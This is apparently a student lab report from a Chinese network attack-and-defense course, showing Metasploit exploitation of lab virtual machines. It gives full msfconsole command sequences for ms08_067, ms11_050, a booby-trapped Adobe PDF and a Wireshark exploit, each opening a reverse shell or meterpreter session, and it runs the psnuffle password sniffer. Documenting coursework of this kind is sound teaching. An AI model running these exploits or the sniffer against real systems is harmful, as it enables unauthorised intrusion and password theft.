zoukankan      html  css  js  c++  java
  • 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用

    目录

    一、实验内容
    二、实验步骤
    1、一个主动攻击实践

    2、一个针对浏览器的攻击,如ms11_050;

    3、一个针对客户端的攻击,如Adobe;

    4、成功应用任何一个辅助模块

    一、实验内容

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    • 一个主动攻击实践,如ms08_067;

    • 一个针对浏览器的攻击,如ms11_050;

    • 一个针对客户端的攻击,如Adobe;

    • 成功应用任何一个辅助模块。

    返回目录

    二、实验步骤

    1、一个主动攻击实践

    实现ms08_067

    靶机为Win2000

    • 在攻击机kali输入msfconsole进入控制台
    • 输入如下指令:
    msf > use exploit/windows/smb/ms08_067_netapi //选择漏洞
    
    msf exploit(ms08_067_netapi) > show payloads
    
    msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //选择载荷
    
    msf exploit(ms08_067_netapi) > set LHOST 10.0.0.110 //攻击机IP
    
    msf exploit(ms08_067_netapi) > set LPORT 5315
    
    msf exploit(ms08_067_netapi) > set RHOST 10.0.0.111 //靶机IP
    
    msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
    
    msf exploit(ms08_067_netapi) > exploit
    

    • 使用win2008作为靶机,结果渗透失败了...看来该靶机打过补丁,换一个试试

    • 换了个win2000的虚拟机(10.1.1.123)作为靶机,成功渗透~输入ipconfig等指令可以获得靶机的信息

    返回目录

    2、一个针对浏览器的攻击

    ms11_050

    靶机为Win7,浏览器为IE8

    • 在msf控制台中输入search ms11_050,搜索漏洞的相关信息

    • 输入use exploit/windows/browser/ms11_050_mshtml_cobjectelement,使用该漏洞
    • 依次输入如下指令
    # set payload windows/meterpreter/reverse_tcp //选择载荷
    # set LHOST 10.1.1.109  //设置攻击机IP
    # set LPORT 5315
    # set RHOST 10.1.1.243  //设置靶机IP
    # exploit
    
    • 将生成的网址输入Win7的IE8中,kali自动回连,渗透成功~

    返回目录

    3、一个针对客户端的攻击

    (1)Adobe PDF阅读器

    靶机为Win7

    • 输入search adobe,查找漏洞
    • 输入use windows/fileformat/adobe_cooltype_sing,使用漏洞
    • 输入以下指令:
    # set payload windows/meterpreter/reverse_tcp   //选择载荷
    # set LHOST 10.1.1.109 //攻击机IP
    # set FILENAME 20165315.pdf  //设置生成pdf文件的文件名
    # exploit
    

    • 生成文件后,输入如下指令:
    # use exploit/multi/handler //进入监听模块
    # set payload windows/meterpreter/reverse_tcp
    # set LHOST 10.1.1.109 //攻击机IP
    # set LPORT 5315
    # exploit
    

    • 将生成的pdf放进靶机中,使用Adobe打开,但是我这边还安装的是11.0版本的Adobe,而且用管理员身份也卸载不掉,要求用system权限卸载...由于虚拟机也比较卡,我就选择先试试别的客户端行不行

    返回目录

    (2)WireShark捕包器

    靶机为WinXP(也尝试了Win7)

    • 执行如下指令:
    # cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat  //进入漏洞程序所在目录
    # msfconsole
    # use exploit/windows/fileformat/wireshark_packet_dect.rb  //使用漏洞
    # set payload windows/meterpreter/reverse_tcp //选择载荷
    # set LHOST 10.1.1.109 //攻击者地址
    # exploit
    
    • 在WinXP中成功实现了回连,但是Win7没有反应,应该是打了补丁

    返回目录

    4、成功应用任何一个辅助模块

    靶机为Win7,被嗅探的上网浏览器为IE8

    • 输入cd /usr/share/metasploit-framework/modules/auxiliary进入到目录中查看有什么辅助模块

    • 我选择了sniffer嗅探器进行实验,进入目录后发现只有psnuffle.rb,这是metasploit中的口令嗅探工具,只有在接入对方网络的初始访问点后才能进行嗅探

    • 在msf控制台中输入use auxiliary/sniffer/psnuffle,使用该漏洞
    • 设置了靶机IP地址后,输入run开始运行,可以看见捕获了上网的记录,渗透成功~

    返回目录

    三、实验中遇到的问题

    • 在任务三中,我使用Adobe PDF打开含后门程序的PDF时,无法实现回连,换了好几个靶机都是这样

    解决过程:
    这个实验采用的漏洞是exploit/windows/browser/adobe_cooltype_sing,这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出,而我使用的Adobe版本是11.0,修复了该漏洞,所以无法实现渗透攻击。换一个9.0版本的应该就可以了,然鹅我还没卸载成功之前的版本,有时间再做吧,不拘泥于这一个客户端程序。

    返回目录

    四、实验总结

    1、基础问题回答

    • 用自己的话解释什么是exploit,payload,encode

    exploit就是用于渗透攻击的工具,可以运送payload载体;

    payload是载荷,在实验中就是一段shellcode代码,可以将恶意代码植入正常程序,具体执行攻击代码的模块;

    encode是用于给恶意代码编码,进行伪装,实现面杀的工具。

    2、离实战还缺些什么技术或步骤?

    • meterpreter里面很多漏洞都已经是比较早之前的了,大多数有攻击价值的靶机都已经给有关漏洞打上补丁了,现实中不可能轻易利用这些漏洞攻击,所以需要获取最新漏洞情报。
    • meterpreter虽然提供了很多payload,但是功能都已经固定,要是能自己编写实现特定功能的payload,这样的攻击会更有针对性。
    • 大多数攻击都要关闭防火墙,但是实战中一般不会关掉防火墙,如何绕开防火墙也是重点

    3、实验感想

    通过这次实验,深切的体会到了补丁的重要性,自己电脑上一定要打好补丁。而且不要轻易打开来源不明的文档文件等等,可能是携带后门程序的恶意文件。还有就是要定期更新软件,各个软件的更新可能会包含补丁的升级,让电脑更加安全。

    返回目录

  • 相关阅读:
    串口数据字节位的理解
    【转】arm-none-linux-gnueabi-gcc下载
    【转】网络排错全面详解
    【转】VMware虚拟机三种网络模式详解
    【转】vi编辑只读文档无法保存的解决办法
    【转】关于在linux下清屏的几种技巧
    【转】64位Ubuntu 16.04搭建嵌入式交叉编译环境arm-linux-gcc过程图解
    ELF文件
    UCOSII内核代码分析
    vmware安装win7提示No CD-ROM drive to use:GCDROM not loaded
  • 原文地址:https://www.cnblogs.com/yh666/p/10720015.html
Copyright © 2011-2022 走看看